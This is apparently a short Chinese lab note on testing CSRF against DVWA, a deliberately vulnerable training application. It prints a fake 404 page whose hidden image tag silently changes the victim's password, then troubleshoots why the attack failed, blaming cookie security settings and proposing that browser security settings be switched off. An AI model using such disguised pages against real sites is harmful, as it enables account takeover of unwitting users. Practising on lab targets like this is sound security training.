一、渗透测试
二、渗透测试过程中遇到的问题和解决
在初级csrf中,想要通过伪造一个404页面,达到修改密码的效果
伪造404页面的html代码如下:
<html>
<head>
</head>
<body>
<img src="http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#" border='0' style="display:none;"/>
<h1>404<h1>
<h2>file not foundww.<h2>
</body>
</html>
通过打开这个html,页面出现了404,但是密码并没有更改成功
直接通过http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#,密码是可以更改成功的。
解决: 关闭浏览器的一些安全设置,火狐浏览器如图:
解决过程:
通过html打开404页面时,发现cookie的secutiry 为 impossible,而直接在dvwa中修改密码的cookie的secutiry 为 low,两者的phpsessid也不一样,各种查资料,发现可能的浏览器的安全设置导致的。。。